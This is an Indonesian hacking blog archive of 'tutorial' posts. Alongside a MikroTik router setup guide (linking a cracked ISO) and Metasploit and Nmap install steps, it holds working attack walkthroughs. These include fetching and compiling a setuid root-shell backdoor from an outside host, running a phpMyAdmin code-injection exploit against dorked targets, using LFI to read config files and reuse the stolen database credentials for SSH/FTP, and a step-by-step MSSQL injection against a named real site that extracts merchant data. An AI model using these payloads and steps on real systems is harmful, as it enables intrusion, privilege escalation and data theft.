Tampilkan postingan dengan label tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label tutorial. Tampilkan semua postingan

Cara Instalasi Mikrotik Sebagai Router

Posted on 10.43 by CS-31

Pertama kali yang harus di siapkan adalah komputer server minimal dengan spesifikasi :
prosesor PII
Memory 128
NIC (LANCARD) 2 buah
Hardisk minimal 1giga
CDroom

1. Mulailah mendownload mikrotiknya, download ISO nya disini : http://www.indowebster.com/mikrotik2927crackediso.html ini yang versi 2.9.27 free edition

2. Kemudian bakar di CD, burning Image.

3. Setelah itu, masukkan cd yang tadi telah terisi mikrotik kedalam komputer server kemudian hidupin komputer tersebut.

4. Tunggu hingga pada komputer muncul seperti dibawah ini :
Image

5.Setelah itu tekan tombol ‘a’ (tanpa petik) untuk meng-install semua fasilitas yang terdapat pada mikrotik dan ketik ' i ' untuk menginstall.

6.Biarkan saja porses berjalan, karena instalasi sedang berlangsung, mulai dari formating disk hingga proses selesai instalasi, jika muncul tampilan seperti di bawah ini maka instalasi telah selesai.

Image

7.Setelah proses selesai, download lah tool bawaan mikrotik, (winbox) bisa di download disini :

http://www.mikrotik.co.id/getfile.php?n ... 2.2.11.exe

8. Setelah itu tancapkan kabel dari modem ADSL ke lancard satu pada komputer yang telah di install mikrotik.

9. Kemudian LanCard kedua ke sebuah HUB / swicth untuk jaringan lokal.

10. Instalasi telah selesai dilakukan, sekarang remote komputer server yang telah di instalasi di atas dengan winbox yang telah kita download, dengan menggunakan komputer lain.

11. Pilih router yang tadi kita install, default identity nya mikrotik, username admin, password kosong.

Image

12. Pilih menu Interface, jika telah berjalan dengan benar, maka akan muncul 2 buah interface lancard.

Image

13. Double Klik pada salah interface yang merujuk ke lokal dan beri nama Lokal.

Image

14. Dengan cara yang sama, Interface yang merujuk ke modem beri nama Publik.

15. Setelah itu, pilih menu IP address.

Image

16. Muncul Tampilan seperti i bawah ini, kemudian tekan tombol plus + di pojok kiri nya.

Image

17. # Tambahkan Ip addressnya, misal
IP modem Speedy 192.168.1.1, maka IP pada mikrotik : 192.168.1.2/24 dan berinama

kemudian tekan tombol plus + di pojok kiri nya, kmudian tambahkan IP address nya Lancard Satunya lagi :
misalnya Ip pada lokal 10.10.10.1, maka masukkan IP address 10.10.10.1/27, angka /27 untuk 30 host IP, anda bisa mempelajarinya lebih lanjut tentang konsep subnetting disini :
Konsep dasar IP address : http://www.forummikrotik.com/beginner-i ... dress.html
Konsep Subneting : http://www.forummikrotik.com/beginner-i ... takut.html

18. setelah itu pilih IP dan kemudian pilih sub Menu Routes.

19. Kmudian masukkan IP gateway nya, dengan cara menekan tombol plus + di pojok kiri nya yaitu IP dari Modem 192.168.1.1, kmudian tekan tombol OK.

Image

20. Setelah semua langkah di atas selesai, langkah selanjutnya adalah mengisi DNS dengan cara pilih menu IP > DNS.

Image

21. Pilih Setting dan masukkan IP dns, dengan primary DNS 202.134.1.10 (default speedy) yang kedua secondary DNS 202.134.0.155 (DNS speedy).

Image

22. Setelah selesai tahap akhir yang anda harus lakukan, yaitu membuat rule untuk bisa di pergunakan secara lokal. Tahap ini sangat penting, dimana komunikasi lancard 1 dengan lancard 2 diletakkan disini. Inti dari setting diatas ada pada tahap ini, maka jangan sampe kliru.

23. Pilih IP > Firewall > NAT > General.

Image

24. Chain = srcnat, Out interface = Publik (interface tadi yang telah kita beri nama publik) kmudian pilih action = masquerade kemudian tekan tombol OK untuk mengakhirinya.

Image

25. # Lakukan restart pada router dengan cara menekan New Terminal , kmudian menggetikkan script system reboot, dan tekan Y

26.Setelah selesai restart lakukan pengecekan dangan cara ping, masuk pada New terminal ping pada gateway 192.168.1.1, ping pada DNS 202.134.1.10, kalo terjadi replay brarti router udah OK.

27. Jika terjadi Riquest Time Out, brarti anda tinjau ulang pada router anda atau pada lancard anda, atau pada modem anda, atau pada koneksi anda dengan speedy
28.Sekarang instalasi bisa di katakan telah selesai, tinggal meneruskan IP ke semua client dimulai dari 10.10.10.2 dan seterusnya hingga 10.10.10.30 karena subnet yang kita buat tadi 30 host.

Semoga tutorial ini dapat bermanfaat. Dan mudah2an tutorial selanjutnya menyusul.

Wassalamu'alaikum...

Sumber : MC-crew.org

Root Shell Backdoor

Posted on 05.55 by CS-31

:
sh-3.00# cd /bin
sh-3.00# wget trendhoby.com/.ray/rsh.txt
--05:13:12-- http://trendhoby.com/.ray/rsh.txt
=> `rsh.txt'
Resolving trendhoby.com... 219.83.122.166
Connecting to trendhoby.com|219.83.122.166|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 481 [text/plain]

100%[====================================>] 481 --.--K/s

05:13:15 (57.34 MB/s) - `rsh.txt' saved [481/481]

sh-3.00# su
[root@localhost bin]# mv rsh.txt rsh.c
[root@localhost bin]# gcc -o main rsh.c
[root@localhost bin]# chmod gu+s main
[root@localhost bin]# chmod o+x main
[root@localhost bin]# chattr +i main
[root@localhost bin]# rm -f rsh.c
[root@localhost bin]# exit
exit
sh-3.00# exit
exit
[cs-31@localhost local24]$ main

-==[ Root Shell Backdoor ]==-
-==[ Hacker-Newbie Community ]==-
-==[ www.Hacker-Newbie.Org ]==-

Starting Interactive Shell...
Session Started. Enjoy the hack !!

[root@localhost local24]#

[root@localhost local24]# id;whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root
[root@localhost local24]#

Tool name: darkjumper version 4.0
C0d3r: mywisdom (solhack 2004 c0d3r)
Released on: February 2010
Download url:
http://yoyoparty.com/upload/darkjumper.tgz

mirror:

http://fams-online.com/images/darkjumper.tgz

Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
Additional feature: 30 fake http user agent(s)

Requirement(s): python > 2.5.x, perl

Ok introducing my new upgraded tool called darkjumper version 4.0. Ok here's a little tutorial about "Using Darkjumper"
This tool can run on linux and windows.

Tutorial for Linux Environment (command line)

oke langsung aja
pertama install dulu perl n pythonnya
==>
$ apt-get install perl
$ apt-get install python

$ wget http://fams-online.com/images/darkjumper.tgz
$ tar zxvf darkjumper.tgz

view source
print?
1 cd darkjumper;ls -la
view source
print?
01 bt next_steps # cd darkjumper
02 bt darkjumper # ls -la
03 total 872
04 drwxr-xr-x 2 turkmentel root 4096 Feb 6 00:38 ./
05 drwxrwxrwx 11 root root 4096 Oct 2 01:19 ../
06 -rwxrwxrwx 1 turkmentel 1001 1727 Feb 5 18:16 cgilist*
07 -rwxrwxrwx 1 root root 485 Jun 8 2009 clearlog.py*
08 -rwxrwxrwx 1 turkmentel 1001 1263 Oct 27 21:58 darkcgi.pl*
09 -rwxrwxrwx 1 root root 35840 Feb 6 00:28 darkjumper.py*
10 -rwxrwxrwx 1 root root 9 Feb 6 00:37 darkjumperlog.txt*
11 -rwxrwxrwx 1 root root 23128 Feb 5 17:29 devilzc0de.py*
12 -rwxrwxrwx 1 root root 57154 Jun 8 2009 shot1.jpg*
13 -rwxrwxrwx 1 root root 141527 Jun 8 2009 shot2.jpg*
14 -rwxrwxrwx 1 root root 255572 Jun 8 2009 shot3.jpg*
15 -rwxrwxrwx 1 root root 188846 Jun 8 2009 shot4.jpg*
16 -rwxrwxrwx 1 root root 101075 Jun 8 2009 shot5.jpg*
17 -rwxrwxrwx 1 root root 4876 Jun 8 2009 subscan.py*
18 -rwxrwxrwx 1 root root 5254 Jun 8 2009 subscan2.py*
19 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes.py*
20 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes2.py*
21 bt darkjumper #
kalo mau liat lognya liat langsung aja
pakek ini

view source
print?
1 ./clearlog.py
or : python clearlog.py
darkjumper.py

Here is your main tool.

Ok then you are ready to run darkjumper.py, let's have a try by typing:

view source
print?
1 ./darkjumper.py
And here's the view from my b0x:

selamat men coba

Metasploit di ubuntu 9.10

Posted on 06.23 by CS-31

langsung aja masukkan console berikut ini ke dalam terminal

==>
sudo apt-get install libglade2-ruby sqlite3 libsqlite3-ruby1.8 && sudo apt-get install libdbd-sqlite3-ruby1.8 libopenssl-ruby subversion rubygems
==>
==>
wget http://www.metasploit.com/releases/framework-3.2.tar.gz && tar xvfj framework 3.3.1.tar.bz2 && cd msf3
==>
sudo ./msfgui
==>
svn update
==>


console di atas harus menjadi root

sooooooo selamat mencoba :D

Install Metasploit di Linux ubuntu

Posted on 23.29 by CS-31

habis belajar sana sini sana sini akhirnya dapet n aku cobak mak nyus

yaitu cara install metasploit di dalam linux ubuntu

hehe langsung aja yaa
pertama install ruby dulu
caranya
=>
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
=>

install subversion
=>
$ sudo apt-get install subversion
=>

kemudian dari situ ketikkan perintah
=>
$ sudo apt-get build-dep ruby
$ sudo apt-get install ruby-dev libpcap-dev
=>

kemudian database support
install driver
=>
$ sudo apt-get install rubygems libsqlite3-dev
$ sudo gem install sqlite3-ruby
=>

atau untuk mysql
=>
$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql
=>

kemudian install Framework
=>
$ tar xf framework-3.X.tar.gz
$ sudo mkdir -p /opt/metasploit3
$ sudo cp -a msf3/ /opt/metasploit3/msf3
$ sudo chown root:root -R /opt/metasploit3/msf3
$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
=>

terus extensionsnya jangan lupa juga
=>
$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
=>

untuk eneber wifinya modulesnya
=>
$ sudo bash
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install
=>

buat update
=>
$ sudo svn update /opt/metasploit3/msf3/
=>
code:

$ sudo crontab -e -u root # enter the line below
1 * * * * /usr/bin/svn update /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1

code = =>



selamat mencoba

PhpMyAdmin injection code

Posted on 17.00 by CS-31

ini semua setelahh habis maen-maen forum di xcode.or.id
eh nemu yang beginian
ingin hati ingin mencobanya heheheheheh
tapi ane masih pakek windows jadi share dulu aja

hehehe
semoga bermanfaat

1. Download exploit nya di milw0rm
Code:
http://milw0rm.com/exploits/download/8921

2. setelah di download ubah permission file yang dengan cara :
Code:
chmod 755 nama_file.sh

3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl

4. googling :
Code:
inurl:phpmyadmin

5. contoh nya :
Code:
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://*********.*****.**//config/config.inc.php?c=ls+-l+/
http://***************//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentestergmail.com


dan hasilnya :
Code:
total 112
drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin
drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot
lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x 13 root root 13840 May 31 08:21 dev
drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc
drwxr-xr-x 5 root root 4096 May 4 13:49 home
lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib
drwx------ 2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x 3 root root 4096 Feb 19 20:07 media
drwxr-xr-x 14 root root 4096 May 18 22:39 mnt
drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root 0 May 31 08:21 proc
drwxr-xr-x 9 root root 4096 May 19 14:47 root
drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin
-rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv
drwxr-xr-x 12 root root 0 May 31 08:21 sys
drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp
drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr
drwxr-xr-x 15 root root 4096 Feb 19 20:26 var
lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server


ok dehhh sekian dulu ya :D

thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain :D
salam PsyChotr0n

From : Xcode

pengen jelas monggo berkunjung
http://forum.xcode.or.id

Tutorial mendapatkan SSHcpanel Login

Posted on 20.30 by CS-31

Ini aku dapet setelah aku jalan-jalan kesana kemari akhirnya dapet cuman
aku dapetnya pakek windows,

nah sekarang ane akan nyobak dengan pakek linux.
intinya sih sama aja yaa hanya perbedaan dari taraf kerjanya :D
langsung aja yaaaa

ada beberapa tool yang digunakan untuk mendapatkan login ssh, cpn
Salah satunya "ConfigSpy", namun untuk menggunakan tool ini anda sudah harus berada dalam system/host target.

kita coba yang lain hehehe monggoo

http://[site]/[path]/xx.php?file=[LFI]

nah ini merupakan cara untuk web bug dari LFI

Sebelum menggunakan, kita harus tau aplikasi apa yang digunakan oleh we tersebut. Maksud saya di sini adalah kita mencari tau dahulu path atau lokasi dimana file config yang mengatur koneksi ke database. Mengapa?? Seperti yang dilakukan oleh "ConfigSpy", yaitu mengambil login database untuk mencoba login ke ftp.

Seperti yang kalian tau bahwa sering terjadi kecerobohan dalam memberi login database, dimana login tersebut sama dengan login ke ftp maupun ssh.

Nah ...
Pada ada aplikasi cms, path config nya terdapat pada pathnya...

URL dari exploit nya menjadi seperti ini (DEMO):

http://site/plugins/my_images/image.php?file=../../config.php

../../ <------- mundur folder sebanyak 2x dari lokasi awal. Content yang kita dapatkan adalah: ........ cut ...................... $mySQLuser = 'guejelek'; $mySQLpassword = 'guehaho'; ........ cut ...................... Kalo sudah dapat seperti itu silahkan di coba login ke ftp/ssh :) Kalo gagal berarti login nya tidak sama. Coba terus, tetap semangat -_- uUtuk bug cms ini telah ada exploit untuk mempermudah dan menghemat tenaga. Silahkan download di sini.

Cara penggunaannya (linux):
lebih dahulu install perl dulu yang tutornya ada di bawah
kemudian ke console ketik

root@ubuntul:~ file.pl 'target'

[~] Exploiting http://terget.com/ ...
[~] DB Username: guejelek
[~] DB Password: guehaho

Tips ini berlaku untuk aplikasi yg memiliki Bug LFI/LFD.
Silahkan edit exploit nya sesuai dengan kebutuhan

Selamat Mencoba deh :D

thanks for C0li, Vycod, cak Surep, IHT, MCC, all My friends

heheh ini aku dapet setelah aku pengen mengexploit web tapi source codenya musti pakek perl

jadi musti instal dulu karena linuxku baru

jadi pertama-tama update ubuntunya dulu, consolenya:

sudo apt-get update

abis itu baru dah kita download perlnya dengan cara

sudo apt-get install perl

insyaallah dapet :D

terus gimana cara menggunakan

pertama kamu

program perl biasanya berada di

usr/bin/perl

cara menggunakan, pertama ketik

chmod +x file.pl
./file.pl


mka akan jalan deh :D

selamat mencoba yaaa

Instal Nmap Di ubuntu

Posted on 19.28 by CS-31

Kali ini saya akan menjelaskan bagaimana menginstal Nmap di ubuntu

pertama yang musti dilakukan adalah kita masuk terminal linux ubuntu

setelah masuk kita harus jadi rootnya, caranya ketik:

sudo -i

setelah menjadi root
kemudian ketik :

apt-get install nmap

untuk mendownload dan menginstal nmap

setelah itu kalo kita ingin mengscan target
consol yang digunakan adalah
========================================
nmap -v -a "target domain"
nmap -v -sp "ip addres range"
nmap -v -ir port open -pn port yang digunakan
=======================================
contoh
nmap -v -a google.com
nmap -v -sp 193.168.0.1/16 10.0.0.0/8
nmap -v -ir 10000 -pn 80

Vidio SQLI INjection

Posted on 16.52 by CS-31

langsung aja deh ini vidio tutornya hehehee

http://www.4shared.com/file/161026854/8824db38/SQLITheCyber.html

Tutorial SQLi Injection

Posted on 13.11 by CS-31

langsung aja g usah banyak bacot download aja tutornya

ini http://www.youtube.com/watch?v=M9biOFTMIDI&layer_token=12251d44867ab0f6

tutorial jumping vidio

Posted on 14.31 by CS-31

buat kamu yang pengen bisa cara rooting ato jumping dari 1 website ke web lain
silakan diliat vidio ini
hihihihi

Hacking web ASP

Posted on 18.33 by CS-31

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12

CEK VULN / GAK !!!
==================

Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'

Jika Error nya seperti ini :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56

Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua :D

maka Lanjut ...

CARI STRUKTUR TABEL !!!
=======================

1) Debugging

Debugging di sini untuk memunculkan pesan error dr MsSQL.

SQL Inject nya adalah "and 1="

2) Munculkan nama tabel

Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Error yang muncul adalah :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56

bisa dilihat di situ kita dapat tabel dengan nama "Merchants".

berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.

skrg kita cari tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

Error yang muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56

Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^

nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

Error yng muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.

CARI STRUKTUR COLUMN !!!
========================

Contoh kita mau cari column yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D

QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column "address". cari lage column ne ...

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

Error yg muncul:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tuh column "merchantName" ekkekekeke ....

Silahkan kalo mo nyari lagi ^^

PENGAMBILAN DATA !!!
====================

Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 merchantid from merchants))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56

dapat "merchantid" = "alohacc".

nah gmn kalo mau ngambil isi column ne sekaligus ??

Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56

Note : %2b = + sedangkan ':' = pembatas


untuk vidionya silakan download disini

from : c0li.blogspot.com